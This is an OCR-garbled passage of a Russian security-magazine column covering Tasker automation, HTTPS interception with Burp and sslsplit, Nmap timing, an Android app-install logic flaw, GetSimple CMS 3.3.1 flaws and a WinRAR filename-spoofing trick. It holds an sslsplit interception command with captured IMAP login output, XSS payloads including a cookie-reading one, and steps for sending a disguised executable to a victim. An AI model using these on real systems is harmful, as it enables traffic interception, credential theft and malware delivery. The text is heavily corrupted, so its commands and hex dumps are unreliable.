> А и^оКетсгЕе Ме55а§ е -> 0еҮ1сеЈ 'ЧаЫе 1:" 3 



На планшете: 

Контекст: Состолние -> Плагин -> Аи^оКетсгЕе -> Еуегтс Ве- 
һаУ1оиг: Оп., Ме55а§е <-■ 
ҒЈ11:ег: "55" 

Задач а: Сигнал -> У ведомление -> Названи е: "5М5", Текст: 
"Получено 5М5" 

Теперв, когда на смартфон придет 5М5, на планшете по^вит- 
с^ уведомление. Име^ полнукз версикз Аит.оРепло1:е, профили 
можно расширитв, вклкзчив в отправл^емое сообидение ин- 
формаиикз об отправителе и текст сообидени^ (переменные 
%5М5РҒи%5М5РВ). 
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Рис. 7. Веб-интерфеисуправлени^ Аи1оРето1е 
ВЫВОДЫ 

Тазкег делает смартфон по-насто^идему умным устроиством. С помоидыо него 
и множества плагинов можно запрограммироватв практически лкзбои аспект работы 
устроиства. Показанные в статве примеры лишв мала^ частв того аисберга, которыи 
скрываетс^ за простым и при^тным полвзователвским интерфеисом. И-И 
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ПЕРЕХВАТИТВ НТТР5-ТРАФИК, ИСПОЛВЗУЛ 
ТРАЫЗРАРЕЫТ РРОХҮ 



РЕШЕНИЕ 

Нередко бывает нужно перехватитв данные. Например, дгт решени^ исследова- 
телвских задач или при проведении реалвных атак. Причем нар^ду с возможностыо 
посмотретвжелателвно еиде иметв возможноств и помен^тв что-то в потоке данных. 
И если с обычными протоколами по болвшеи части все просто, то при оборачивании 
их в 551 (что случаетс^ в последнее врем^ все чаиде) мы получаем проблемку. 

Океи, если говоритв об анализе трафика из браузера, то проблем не возника- 
ет. Лкзбои перехватывакзидии прокси-сервер (а-л^ Вигр или 7.АР) справитс^ с зтим 
на раз. А что делатв, если «ломаемое» клиентское приложение не умеет исполызо- 
ватв прокси? А если исполвзуетс^ там какои-нибудв не НТТР-протокол? О решении 
второи проблемы мы поговорим в следукзидеи задаче (разделены они были лишв 
дл^ будуидего удобного поиска), о первои же — читаи ниже. 

Хотелосв бы отметитв, что идеино «атака» на 551 будет одинакова дгт лкзбои 
из тулз. Важно пониматв, что никто не пытаетс^ расшифроватв передаваемые дан- 
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ни^, котора^ происходит на первых әтапах подклкзчени^, то еств заставитв клиент 
думатв, что наш сервис — зто то место, куда он хотел подклкзчитвс^. Подписи, сер- 
тификаты и все такое. Но не будем углубл^твс^ и переидем к сути. 

Еств клиентское приложение, работает по НТТР5, но кззатв прокси не умеет. Мы 
можем исполвзоватв тотже Вигр или лкзбои другои прокси, которыи в состо^нии ра- 
ботатв в режиме .гапзрагеп. (Јтлз.Ые). 

Немного по^снкз, в чем разнии,а. Начнем с простого — с НТТР, а потом переидем 
к НТТР5. Длл обычного НТТР-трафика, когда исполызуетс^ прокси, ПО (а-л^ браузер) 
посылает такои запрос: 

6ЕТ ЈтЕЈр: //апу_һо51:. сот/иг1?диегу=51:гЈп§ НТТР /1.1 
Н05 1:: а пу_һо 51: . сош 

Когда прокси отсутствует, то браузер шлет 

6ЕТ /иг!?диегу=5*:гјпе НТТР/1.1 
Н05 1:: а пу_һо 51: . сош 

Как видишб, в варианте с прокси (обычным прокси) в запросе (то, что после ӨЕТ) 
присутствует им^ хоста. При получении запроса прокси по әтому имени понимает, 
куда нужно подклкзчитвс^ и отправитв запрос. 

Если же приложение не поддерживает работу с прокси, то у нас возникает две 
проблемы: как заставитв его подклкзчитвс^ к нам и как наш прокси может пон^тв, 
куда подклкзчатвс^. 

Дгт решени^ первои задачи нам пригодитс^ лкзбои метод, при котором трафик 
от приложени^ потечет через нас. Мы можем либо статв геитвеем/шлкззом дгт под- 
сети (АВР ро.зоптд в помош^), либо статв сервером (записв в һозЈз, 0Ы5 зроолпд 
и прочее), либо исполызоватв что-то поизвраиденнеи. 

Втора^ же задача решаетс^ тем, что прокси берет им^ сервера, куда надо под- 
клкзчатвс^, но не из 11В1_'а, а из заголовка Ноз. в самом запросе. Вот такое поведение 
прокси и называетс^ .гапзрагеп. (хот^ имекзтс^ и другие значени^). Ты, например, 
можешвходитв в инет на работе, неуказав прокси, но фактически подклкзчени^ твои 
будут все равно идти через корпоративныи прокси, с теми же ограничени^ми на кон- 
тактик, что и у проксированных кззеров. 

Но әто было про НТТР. А как же с НТТР5? Здесв все труднее. 

В прошлом номере п описывал, как работает браузер через прокси, подклкзча^св 
к НТТР5-саитам. Напомнкз, что браузер подклкзчаетс^ к прокси методом СОЫЫЕСТ 
с указанием имени хоста, куда он хочет подсоединитвс^. Прокси же, в свокз оче- 
редв, подклкзчаетс^ по указанному имени хоста, а далвше просто редиректит тра- 
фик от браузера на сервер. Если же приложение не поддерживает прокси, то какже 
{гапзрагепЈ-прокси узнает, куда ему подклкзчатв клиент? В автоматическом режи- 
ме — никак. 

Но все-таки вариант еств, если добавитв скзда еиде одну технологикз. Она назы- 
ваетс^ 5еп/ег Ыапле 1пс!.са-.оп (5141) и ^вл^етс^ одним из расширении 551_-протокола. 
Поддерживаетс^ еиде далеко не всеми, но основные браузеры уже в лодке. Техноло- 
ги^ оченв проста^. Клиентуказывает им^ сервера, куда подклкзчаетс^ в самом нача- 



ле 551 һап<Ј5һак'а (то еств әта инфа не зашифрована). 

Таким образом, у {гапзрагепЈ-прокси оп^тв-таки по^вл^етс^ возможноств авто- 
матически проксироватв данные между клиентом и серверами на основе анализа 
5Ы1 при подклһочени^х. 

Теперв обида^ ситуаии^ примерно ^сна. Переидем к частност^м. За основу возв- 
мем Вигр и его возможности, кактиповои пример. 

Если клиентское приложение не поддерживает прокси, то Вигр, какты уже пон^л, 
умеет работатв в режиме ЈтлзЈЫе ргоху. Вклһочитб его можно, воспроизвед^ следукз- 
идукз иепочку: Ргоху — > 0рт_з.оп5 — > Ргоху Из^епегз — > Выделение прокси — > ЕсИт. 
— > Ке^иезт. НапсШп^ — > Биррогт. 1пУ151Ые Ргоху. 

Если клиент поддерживает51Ч1, то всехорошо: Вигр может и к нужномухосту под- 
клкзчитвс^, и сгенерироватв сертификат либо самоподписанныи, либо подписанныи 
Вигр'овским СА. Но если зто не так, то придетс^ поработатв руками. 

Во-первых, на вкладке Недиез! НапсШпд мы должны указатв адрес и порт, куда не- 
обходимо осуидествл^тв подклкзчение. Во-вторых, в Сег.гПса1е указатв им^ сервера, 
дгт которого будет сгенерен сертификат. Самоподписанныи создатв совсем не по- 
лучитс^. 

^сное дело, әти данные надо еше откуда-то получитв. Тебе, скорее всего, по- 
требуетс^ посмотретв, к какому 1Р-адресу и порту подклкзчаетс^ клиентское прило- 
жение, а далее подклкзчитвс^ к нему напр^мукз и из полученного 551_-сертификата 
вз^тв им^ дгт генераи,ии своего. 

Как видишв, все просто, но местами муторно. Но в итоге мы получаем чистыи 
НТТР-трафик в Вигр'е. За подробност^ми по әтои возможности Вигр'а обрашдис^ 
Сјода. 
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Вигр в режиме туЈзЈЫе ргоху 

ПГПГУПАТ1ЛТ1 11Г 1 1ТТП ТГ1Л _4чМ1/ П ОП 



ИСГСЛ0Н1Ш0 ПС П1 1Г-1ГНФПГ\ 0 001. 



РЕШЕНИЕ 

Какты, наверное, заметил, описанныи выше транспарент-прокси дгт 551_-трафика, 
по сути, представл^ет собои простои порт-форвардинг. Получаетс^ такои редирект 
с подменои сертификата. И на самом деле, ведв в данном случае нет никакои особои 
прив^зки к протоколу, которыи находитс^ внутри 551. То еств предыдуида^ задача 
в какои-то мере подвид зтои. 

Наш же вопрос с прошлого топика — а что делатв, если внутри 551 исполвзуетс^ 
не НТТР-протокол? 1МАР5, ҒТР5 и почти лкзбои другои аналогичныи протокол с бу- 
ковкои 5 на кони,е. В 551 запихивакгг все подр^д. А ведв как сладко было бы обоити 
551 и добратвс^ до чистого трафика... 

Ответ простои. В других случа^х — не исполвзоватв Вигр :), а исполвзоватв что- 
то другое. Еств много различныхтулз, которые в зтом помогут. Какие-то из нихзато- 
чены под конкретныи протокол, но еств и универсалвные. С одним из универсалов 
9\ и хотел бы теб^ сегодн^ познакомитв — с 551_5рН{ . 

Тулза әта прекраснатем, что ее основна^ иде^ оченв проста и пон^тна, но при әтом 
имеетс^ приличныи обвем спеиифичных настроек. Она представл^ет собои простои 
порт-форвардер («если трафик пришел на такои-то порт — пересылаи все в тако- 
е-то место»), но имеет возможноств дгт «работы» с 551. Можно подсунутв реалвныи 
(краденыи) сертификат, создатв самоподписанныи или подписанныи своим СА. Так- 
же поддерживает автоматическукз генераиикз на основе 5141 или редирект трафика 
на конечныи 1Р-адрес (когда мы изображаем из себ^ геитвеи). Плкзс она консолвна, 
что позвол^ет легко автоматизироватв типовые деистви^. Все әто в иелом делает ее 
куда более кззабелвнои дгт проведени^ атак (а не просто анализа протоколов при- 
ложении). Что делатв далвше с трафиком — әто уже зависит от твоих потребностеи. 

Не буду приводитв здесв мануалы по исполвзованикз, а ограничусв неболвшим 
показателвным примером. 

5515р 1Ј1: -к са.кеу -с са.сгс -1 с оппес1:.1о % -I /1:тр 551 <-■ 
Ө.Ө.Ө .Ө 993 ыыы.ехатр1е.ог§ 993 1:ср 0.0.0.0 143 

Здесв - к и -с указывакгг путв до приватного клкзча и сертификата нашего СА, которые 
можно сгенеритв при необходимости, исполвзу^ орепзз!. Осталвные параметры: 
-I — путв до фаила, в котором будет вестисв лог коннектов; 

-1_ — путв до директории, в которои будут сохран^твс^ логи всех подклкзчении (в 
плеин-тексте). 

Далее блок «зз1 0.0.0.0 993 \ллллл/.ехаглр1е.огд 993». 5з1 указывает, что мы снифаем 551 
и надо подменитв сертификат. Далее интерфеис и порт, на котором 551_зр1г1 будет 
прослушиватв трафик. Последн^^ пара — им^ домена и порт, куда 551_зр1г1 должен 
подклкзчитвс^. Блок «1:ср 0.0.0.0 143» почти аналогичен. Здесв мы указываем, что зз! 
не исполызуетс^ (поәтому 1:ср), атакже входнои порт 331_8рМ1. Если 551_зр1г1 «подклкз- 
чен», как геит (шлкзз), то можно не указыватв конечнукз точку подклкзчени^, она будет 
вз^та из 1Р-заголовков. 

Таким образом, мы имеем простукз и универсалвнук) тулзу. Описание ее исполвзо- 



вани^ с примерами можно почитатв здесы а здесв переченв всех возможностеи (тап). 



Ш тао*@)рЫ>х: ~Ы5рИ1:-0.4.7 129x16 



£N1 реек: [ј.тар . доод1етаП . сот] [сотр!есе] 
АИетр! геи^е (Ы 551. 5С5!»1оп 
С0П11есип<ј Ио 174. 125. 136. 16Ј: 993 
> Г)гпд1па1 ^ргург сегтИЧсаге : 

&исјсс1: ОИ: /С=иБ/&Т=СаИтогп1а/1-=Моигүг.а1п У1см/0=6оод1с 1пс/СН=1тар. доод1еппал.1 .сот 
Ситтоп МеЈПке 1 ^ : һпар .уоид1ет«з±1. сип/^тар.иоод^етаП, сот 
Ғ1пчегрг1п1: гЈ9:98:2с:4е:аЗ:9С:7е:2с:47:<:б:ае:г5:Һб:а1:һЗ:сб:21:82:е2:сЗ 
Сегт:1т1сат.е сасһе: ШТ 



===> һогдса зсгусг ссгшкак: 

>и&јеет. он: /с=и5/5Т=са11тогп1а/1_=мо1Јпт.а1п У1еы/о=бос>д1е 1пе/см=1тар.доод1еша11.сот 

^отшоп Нате^: 1тар .доод1ета11. сот/1тар.доод1ета11.соп сИгГсгсп! мпасгопп! 

г ј.пдегрг1п1: ае^һ^е^в^^^һ^^пс^аБ^һЗ^Зе^Т^дЗ^ае^с-аһ^Ө^^Т^е^З^Зе 

551 [192 . 160 , 170. 20] :53002 [74. 125. 136. 16] :993 5П1 : 1тар .доод1етв11. сот сгт. : 1тар .доод1ета!1 . сотДтар .доод1етаИ . сот ог1дсгт:1тағ 
>од1ета11 . сот/1тар . доод1ета!1 . сот 
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СегтЈ.Т1са1:е сасһе: <ЕЕР (5М1 тассһ ог тагдет. тос1е) 



Ј" | гооодрһох: /гтрМ^рвдодсһг 129x19 

гоо!@р^ох:/1:тр/5515рШ/1одсЈ1г* 1аИ 1 2Ө1303в4Т101б102-\ [192 . 168. 17&.2Ө\]\;33&ӨВЛ174.125Л36.10\]\:993.1од 

* САҒАШҺ11Г 1МАН4ГеҮ1 иШҺҺҺС! Ш1_һ НАМҺЫНАСҺ [ДЈ01А 11> ХИЫ СН1Һ1ШҺ1Ч Х-ШҺХ1 1 ХҮ/ЛГ 5А5Һ1К А1ЈШ=ХиА1Ј1Н АЈ I Н=Х0А1Ј I Н2 

Ј 1од1п "рһШрр. Һеске1{адта11. соп" 

* 1АНМЫҺ11Г 1ИМН41еШ (ШЕҺСИ 11ЈҺС НМПС5НА1С ЈиОТА 10 Х1Л5Т СШҺЈЖЕИ Х СИ ЕХТ-1 и11ГЈРҺ1Ј5 СОМРКЕ55=ПЕҒҺАТЕ ЕИАВҺЕ ГШЕ С0М5Т0пЕ 
Е5ЕАКСН 

1 (Ж пһ"П"|рр,һегке1@дгааП .с.пт Рһт1трр Негке! аитһептпсатеп! (^игсекк) 
4 С0МРКЕ55 0ЕҒ1_АТЕ 
4 ОК 5иссе5;> 
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Пример того, как подменлетсл сертификат и мы получаем чистыи 1МАР-трафик 



НАСТРОИТВ ММАР ДЛЛ СЛОЖНЫХ УСЛОВИИ 



РЕШЕНИЕ 

Ыплар, несомненно, тулзенка из топ-дес^тки самых необходимых и закззанныхтулз — 
как дл^ пентестов, так и дл^ мониторинга системы, да и дгт других дел. С однои сто- 
роны, она проста, умна и быстра, за что ее все лкзб^т. С другои стороны, при работе 
с неи в нестандартных услови^х возникакзт различного рода трудности, во многом 
св^занные с тем, что не совсем пон^тно, как же она устроена внутри, ее алгоритмы. 

А внутренности Ыплар совсем не простые, даже если вз^тв ее главныи функиио- 
нал — сканирование портов. Не вдава^св в подробности, можно четко утверждатв, 
что 1делыо создателеи Ыплар было сделатв сканер, которыи бы пределвно точно нахо- 
дил открытые порты (то еств без Та1зе розШуе, Та1зе педаТме), мог бы работатв в раз- 
личных сет^х (стабилвных/нестабилвных, быстрых и медленных), подстраиватвс^ 
под мен^кзидиес^ характеристики сети (например, когда промежуточное сетевое 
оборудование перестало справл^твс^ с нагрузками). То еств поведение Ыплар мен^- 
етс^ динамически, под конкретнукз сетв, под конкретныи хост. 

С другои стороны, его наиеленноств на точноств часто оченв негативно сказыва- 
етс^ на производителвности. Приведу типичныи пример: сканирование хостов в ин- 
тернете, частв из которых находитс^ за фаирволом. На ЗҮЫ-запрос на закрытыи порт 
фаирвол не отвечает ничего, вместо ВЗТ. Казалосв бы, в чем проблема? Как раз в ум- 
ности Ыплао. Так как поичин пооблемы он не знает (<±>аиовол. лагүча^ сетв. огоани- 



чени^ конечного хоста), то он будет замедгттв частоту отправки запросов на сервер 
(до однои секунды по умолчаникз), увеличиватв ожидание до ответа на отправлен- 
ныи запрос (до дес^ти секунд). И добавв скзда то, что Ыплар перепровер^ет порты 
по дес^тв раз. Получаетс^, чтобы просканироватв все ТСР-порты зафаирволенного 
хоста с одним открытым портом, счет переходит даже не на часы, а на дни. Но наи- 
ти-то данныи открытыи порт необходимо. 

Но зто еиде не сама^ проблема. Ыплар, дабы повыситһ свокз производителв- 
ноств, сканирует сетв группами хостов, а не по одному. При зтом характеристики 
сети дгт каждого из хостов будут отслеживатвс^ индивидуалвно, что тоже хорошо. 
Проблема же заклкзчаетс^ в том, что нова^ группа хостов не начинаетс^, пока не за- 
кончиласв предыдуида^. Получитс^, что один хост может затормозитв сканирование 
□.елого диапазона хостов... И чтобы такого не случилосв, желателвно наконеи-то ра- 
зобратвс^ с возможност^ми тонкои настроики Ыплар. 

Признакзсв, сам п не глубокии знатокалгоритмов Ыплар (об әтом ведв даже книги 
пишут: Ыплар ВеЈегепсе СиЈс1е , Ытар ЫеЈууогкЗсаппЈпд ), что необходимо дгт коррект- 
нои настроики таимингов. С другои стороны, у нас тут Еазу Наск, так что скони,ен- 
трируемс^ на основных параметрах и практических рекомендаии^х (которые в болв- 
шинстве случаев отлично работакгг). 

Итак, у Ыплар еств р^д параметров, напр^мукз вли^кзидих на производителвноств. 
Все приводитв не буду, а лишв понравившиес^ :). 

Перед началом сделакз два замечани^. Здесв, ранвше и далее «по умолчаникз» 
значит «дгт профил^ ТЗ», которыи и на самом деле исполвзуетс^ по умолчаникз, 
когда не выбран какои-то другои профилв. А значение <Ипле> задаетс^ в секундах, 
но можно исполвзоватв и другие единии,ы времени, добавл^^ соответствукзидукз бук- 
ву. Например, ЗОООплз, 5Һ, 10з. 

--ЈпШа1-гН-1Јтеои1<1Јте>, --тах-гН-Итеои1 <Ите>. ВТТ (Воипс! Тпр ТЈпле) — вре- 
м^ от отправки пакета до получени^ на него ответа. Оченв важныи параметр, ко- 
торыи посто^нно подсчитываетс^ 1\1плар'ом во врем^ сканировани^. И не зр^, ведв 
по нему Ыплар понимает «производителвноств» сети и конечного хоста. Фактически 
он напр^мукз вли^ет на то, как долго будет ждатв Ыплар между отправкои запроса 
и получением ответа. 

И как ты понимаешв, если ответа мы не получаем, то әто значителвно вли^ет 
на ВТТ. Как следствие, Ыплар, послав ЗҮЫ-пакет в «чернукз дыру» фаирвола, будет 
ждатв в итоге плах-Мт. (даже в быстрои сети), перед тем как пон^тв, что порт зафилв- 
трован. По умолчаникз тШа1 — одна секунда, плах — дес^тв секунд. 

Дл^выбораже корректныхзначенииВТТзапускаемЫтарспараметром-1:гасегои1:е 
(команда рјпд тоже подоидет). По сути, нам надо получитв врем^ прохождени^ па- 
кета до конечного хоста или хот^ бы близкого к нему. Далее рекомендуетс^ дгт ЈпШа! 
указатв удвоенное полученное значение, а дгт тах — учетверенное. 

--тах-ге1пез — оченв простои параметр — максималвное количество повторов. 
Хот^ п уже и писал, что дес^тв повторов может бытв, но әто толвко в случае, если 
Ыплар оидушает «плохукз» сетв. Обычно менвше. Так что если сетв хороша — можешв 
обрезатв вполовину и даже болвше. 

--тах-зсап-с1е1ау <1Јте> — максималвное врем^ ожидани^ между отсылкои па- 
кетов. По умолчаникз — секунда. Если сетв хороша и нагрузки не боитс^ (то еств поч- 
ти всегда), то спокоино можно уменвшатв даже в п^тв раз. 



--һо5т-т1теоит<т1те>. 1 1оследнии параметр относитс^ косвенно к настроике таи- 
минга, но оченв и оченв полезен. Он позвол^ет установитв значение, после которого 
хост «пропускаетс^» в сканировании. 

Представв, сканируем мы сетв класса С и сканирование идет скоренвко. Но тут 
— баи,! — два-три хоста где-то в середине силвно зафилвтрованы. Если не настроил 
все заранее (как указано выше), либо жди «до бесконечности», либо пересканируи 
все заново, но уже с настроиками. 

Так вот, если Ыплар достигает һозЫЈплеои! дгт конкретного хоста, то он останав- 
ливает сканирование и переходит к следукзшим хостам. Установив значение минут 
в двади.атв-триди.атв, можно уже не опасатвс^ «зафаирволенных» хостов, по дости- 
жении лимитов они проскочат. А разобратвс^ с ними можно будетуже позже, настро- 
ив сканирование вручнукз. И да, по умолчаникз он бесконечен. 

Дл^ выбора корректного значени^ рекомендуетс^ просканироватв один-два ти- 
повых хоста и удвоитв/утроитв әто значение. 

Конечно, ествешедругие параметры дгт настроики производителвности г\1плар'а, 
так что если зти тебе не помогли, то обратисв скзда . Но главна^ мыслв, скорее, тако- 
ва: лучше потратитв чутв болвше времени на первичнукз настроику, чем потом ждатв 
или пересканироватв. 
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Данные длл подсчета РТТ получены 



УСТАНОВИТҺ ЛК)Б0Е ПРИЛОЖЕНИЕ НА АШОГО 



РЕШЕНИЕ 

Недавно была задискложена отличнеиша^ логическа^ бага в АпаҮоЈс!. И мне кажетс^, 
әто хорошии, типичныи представителв логических у^звимостеи, а потому хотелосв 
бы познакомитв теб^ с неи. Ведв такие баги — зто просто каиф: и мозгом пошеве- 
литв надо, и наити можно там, где уже «каждыи совал свокз кавычку». 

Итак, сутв проблемы заклкзчаласв в том, что лкзбое андроидовское приложение, 
обладакзшее определенными, не оченв болвшими привилеп/тми, имело возмож- 



ноств установитв ЛКЗБОЕ другое приложение с маркета, с лкзбыми привилеги^ми. 
То еств закачал себе человек игрулвку, а та вз^ла и поставила еиде софта на деваис 
и слила все денвги через какои-нитв 5М5-сервис. Здесв мы видим пр^мои профит 
дл^ злых д^дек, а потому ее автору гугл заплатил две тыс^чи долларов. 

Даваи же разберем багу. ^ не буду вдаватвс^ в технические глубины, а скони,ен- 
трирукзсв на базовых веидах, чтобы те, кто незнаком с дроидами, тоже оидутил вскз 
крутоств. Ведв на самом деле она проста! Здесв все по прини,ипу: по отделвности 
каждыи из «фрагментов мозаики» заидииден, а в и,елом — дыра. 

Мозаика складываетс^ из следукзидего: 

1 . В наше приложение мы можем добавитв \Л/ео\/Је\л/, то еств браузер. При зтом мы 
можем подпихнутв свои ЈауаЗспр! на лкзбукз странииу. 

2. Дгт установки приложени^ из маркета нам необходим лишв браузер. Например, 
ты можешв заити на Өоод1е Р1ау и, если аутентифии,ирован, установитв лкзбое 
приложение на лкзбои свои подиепленныи деваис. 

3. Облада^ кое-какими правами (апс1гоЈс1.регтЈ55Јоп.и5Е_СВЕОЕг\1Т1А1_5), прило- 
жение может запроситв у Ассоип!: Мападег'а деваиса токен на аутентификаи,икз 
и автоматически залогинитвс^ в \Л/еһ\/Је\л/ в твои акк. 

Оидушаешв? Наше приложение может автоматически залогинитвс^ в гугл и с помо- 
идыо подконтролвного Ј5 в \Л/еһ\/Је\л/ полностыо әмулироватв поведение полызовате- 
л^! Всевозможные анти-С5ВҒ-токены, запросы на согласие о высоких правах и про- 
чее мы можем вынутв и «накликатв». Хот^ фактически так же мы можем получитв 
доступ и к другим сервисам гугла. Почту, например, почитатв :). 

Так какбагузадисклозили, значит, ее и закрыли. По предположеникз автора, глав- 
ным изменением стала отмена автоматического логина. Теперв выводитс^ сообиде- 
ние, правда ли мы хотим залогинитвс^, и без кззерского клика «ОК» никак не обои- 
тисв. На әтом все. За подробност^ми отправл^кз к источникам , да и рекомендукз 
запилитв личныи РоС. 

В кон1де хотел бы лишв добавитв про «глубину проникновени^» гугла в нашу жизнв. 
^ не говоркз о проблеме приватности. Аккаунт на гугле дгт оченв многих лкздеи глав- 
ныи, к которому прив^зано почти все. Причем әто не просто набор критичных серви- 
сов, а доступ к браузеру Сһгопле (а потом к ОС?), дроидо-деваисам (чему-то еиде?). 
Мне кажетс^, что әто в будушем значителвно помен^ет типовые подходы к безопас- 
ности. Например, тро^ны. Зачем «закапыватвс^» вглубв систем, обходитв разграни- 
чение прав ОС, подписи драиверов, когда можно спр^татвс^ в Ј5-коде одного из ком- 
понентов браузера, ничего при әтом не обход^ и облада^ контролем над главным 
«выходом»? Хот^ пон^тно зачем :). Или какукз зашиту дгт банк-клиентов может датв 
одноразовыи код по 5М5, если с затро^ненного браузера на компе на все дроид-де- 
ваисы полвзовател^ можно поставитв тро^нчик, которыи будет читатв 5М5? Но әто 
так — словоблудие :). 

Спасибо за внимание и успешных познании нового! И-И 
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Сегоднт мы проанализируем, что произоидет, если добавитв в открытыи 
формат собственные пол^ на примереМпПАП, и рассмотрим р^д\л/еһ- 
у^звимостеи в попул^рнои СМ5 и продукте от МсА1ее. 



РАЗЛИЧНЫЕ УЛЗВИМОСТИ В СЕТ81МР1.Е СМЗ 3.3.1 
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Начнемнашобзорснесколвкиху^звимостеи, которыебылинаиденывСМ5Өет.5Јтр1е, 
пози1дионирукзш,еи себ^ как оченв простукз в исполвзовании. Так как частв у^звимо- 
стеи — зто Х55, то рассмотрим сразу әксплоиты. 





Хранима^ Х55-у^звимостһ 
в 6е1:5Јтр1е СМ5 3.3.1 



ХТ Ыегбһох 





ЕХР1.01Т 

1 . Хранима^ Х55 была наидена в административном интерфеисе настроек, где в по- 
л^х паше и регтаНпк из-за недостаточных проверок можно вставитв вредонос- 
ныи код, которыи будет сохранен вХМ1_-фаил. 

Дгт проверки вводим в поле 015р1ау пате по 11В1_-адресу һт_1:р : //51Т_е . сот/ 
ас1т1п/5ет_т_1п§5 . рһр следукзидии код: 

Ас1тјп"><5сгјр1:>а1ег1:("1");</5сгјр1:> 



2. 



Следукзида^ у^звимоств была также наидена в административном интерфеисе 
в модуле, ответственном за логи, 1о§. рһр, в параметре 1о§, но относитс^ она кот- 
раженным Х55: 



ҺЛр: //згЕе . сот/ас1т1п/1о§. рһр?1о§=1:е51: . 1о§<Јт§/5гс="> <-■ 
"опеггог=рготр1:(с1оситеп1: . соок1е)>^ 
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Ошибка в 6е^5Јтр1е СМ5 3.3.1, 
по которои можно определитв, 
еств ли такое имл в системе 
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3. Третв^ ошибка была наидена в модуле восстановлени^ парол^ и позвол^ет со- 
братв имена полвзователеи, которые еств в системе. Система выводит разные 
сообидени^ дгт суидествукзидих и несуидествукзидих полвзователеи. 

4. Последн^^ у^звимоств оп^тв была наидена в модуле восстановлени^ доступа. 
Механизм восстановлени^ парол^ сразу сбрасывает паролв по запросу без ка- 
ких-либо дополнителвных проверок. Вследствие зтого атакукзидии может отправ- 
л^тв запросы каждукз N секунду, когда полвзователв авторизуетс^ в системе. 
Другои әффект от әтои у^звимости позвол^ет «забомбитв» почту полвзовател^ 
болвшим количеством сообидении о сброшенном пароле. 



Әффективныи путв решитв әту проблему — высылатв ссылку дл^ сброса на почту 



УЛЗВИМОСТҺ НУЛЕВОГО ДНЛ В ШРАР 
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Теперв рассмотрим «Ос!ау»-у^звимоств в попул^рнои программе-архиваторе\/\/ЈпВАВ 
от компании РАВ1.АВ. Пуствтеб^ несмуидает, чтоу^звимоствнулевогодн^ в кавычках. 
Как пишут источники, у^звимоств была наидена еиде 28 сент^бр^ 2009 года (добав- 
лена в базу ОЗУОВ), но при зтом успешно зксплуатируетс^ на верси^х программы 
2012 и выше. Также зта техника была замечена при исполызовании в иелевых атаках 
за март 2014-го. Помимо әтого, у многих полызователеи, как домашних, так и кор- 
поративных, до сих пор остаетс^ стара^ верси^ «дл^ ознакомлени^», и никто ее не 
обновл^ет. Начнем с неболвшои схемы 21Р-формата (см. скриншот). Какты видишв, 
смешение (оТТзет), равное 30, указывает на им^ сжатого фаила. 
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Схема _11Р-формата 



Когда исследователв сжал фаил с помоидыо \ЛЛпВАВ, указав метод сжати^ 21Р 
Ғоггпат., то увидел, что структура полученного фаила схожа, но \ЛЛпВАП добавил не- 
сколвко собственных своиств. Дл^ понимани^ посмотрим на скриншот, где мы сжи- 
маем фаил с именем Те5т_1.т_хт_ и данными ААААА в формате 7.\Р. Как ты заметил, 
\ЛЛпВАВ вставил дополнителвное поле т!1е пате внутрв сжатого фаила. После не- 
болвшого анализа было установлено, что второе им^ даетс^ фаилу после его разар- 
хивировани^. А первое им^ исполвзуетс^ дгт отображени^ в главном окне \Л/јпВАВ 
при просмотре архива. Причем никакои проверки на идентичноств нет, что позво- 
л^ет нам в качестве первого имени исполвзоватв безобидные Кеас1Ме.т_хт_ или Небо. 
јр§, а вот вторым реалвным будет исполн^емыи фаил с расширением ехе или оа.. 



& а ф 



1-51:1, 2 јр __ј 

Т I Е_1.1Д_:Нек' 



Нф 



Нех 



т! II 



□П П 1 



§ __| Ф% 



Дип 5спр. т Кип Тетр1а_е: 21РТеппр1а1е.һ^ т |> 



А Б 



Б Е 



О0О0Һ: 


50 


4Б 


03 


04 


14 


00 


00 


00 


ов 


00 


В1 


&8 


ЗЕ 


44 


од. 


1С 


0010Һ: 


Б7 


79 


04 


00 


00 


00 


ое 


00 


00 


00 


09 


00 


00 


00 


74 


65 


0020Һ: 


73 


7. 


31 


2Е 


74 


78 


74 


73 


84 


02 


00 


50 


4В 


01 


02 


1Ғ 


ООЗОҺ: 


00 


14 


00 


00 


00 


08 


00 


В1 


А8 


8Е 


44 


СА 


1С 


В7 


79 


04 


О0.0Һ: 


00 


00 


00 


08 


00 


00 


00 


09 


00 


24 


00 


00 


00 


00 


00 


00 


0050Һ: 


00 


20 


00 


00 


00 


00 


00 


00 


00 


74 


€5 


73 


74 


31 


2Е 


74 


0060Һ: 


78 


7. 


ОА 


00 


20 


00 


00 


00 


00 


00 


01 


00 


18 


00 


Ғ5 


ОС 


0070Һ: 


27 


СО 


03 


58 


сғ 


01 


Б5 


2С 


6А 


В5 


03 


58 


СҒ 


01 


В5 


2С 


О0Ә0Һ: 


6А 


В5 


03 


58 


сғ 


01 


50 


4В 


05 


06 


00 


00 


00 


00 


01 


00 


0090Һ: 


01 


00 


5В 


00 


00 


00 


2В 


00 


00 


00 


00 


00 











РК. ...... .± "2Г>. 

у . . ' _ 

зс1 . скхз,, . . рк. . ,ү 



±'"20, . -у. 

■■ 5 --- 

1_-еЗ-1. 

К _Ғ * ■ шшшжч + шлш О ■ 

■А.Х1.6.312.Х1.6, 

3 ^1 л -М-Е РК ■ т л ■ ■ т ■ ■ ■ 

I ■■ + 
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ЕХР1.01Т 

Дл^ проверки достаточно воспроизвести следукзшие әтапы: 

1. Берем лкзбои исполн^емыи фаил, например оченв лкзбимыи нами калвкул^тор 
са1с . ехе. 

2. Упаковываем его с помоидыо МпВАҒ., выбрав формат 7\Р. 

3. Открываем полученныи фаил с помоидыо редактора и мен^ем расширение в пер- 
вом имени. На скриншоте п спе_диал_.но открыл один и тот же фаил дгт демон- 
стра__,ии того, что между вторым и первым именем лежит сжата^ информаиЈ/т. 

4. Отсылаем полученныи фаил жертве. 

В прини,ипе, от такои атаки можно заидититвс^ или ты даже ее не заметишв, если 
всегда исполвзуешв отдикз архиватора «Распаковатв скзда / в ...». Но и зто можно 
обоити. 

В одном из исследовании , описывакзидих атаку с исполвзованием әтои техноло- 
гии, показали фишинговое писвмо, в котором было написано, что архив запаролен 
и полвзователв открывал его через архиватор. После чего по^вл^лосв феиковое со- 
обидение с просвбои ввести паролв. 



мостыо в \Л/Јпс1оу\/5 ЈЈпЈсос1е В1_0 ЗрооЈ.пд , становитс^ ^сен вектор атаки. Сутв в том, 
что реалвное им^ фаила, например Ғес1е. јр§.ехе, \Л/Јпс!о\л/5 покажет полвзователкз 
как Ғес1ехе. . јр§. То еств, обБединив зти технологии, получаем, что, открыв через 
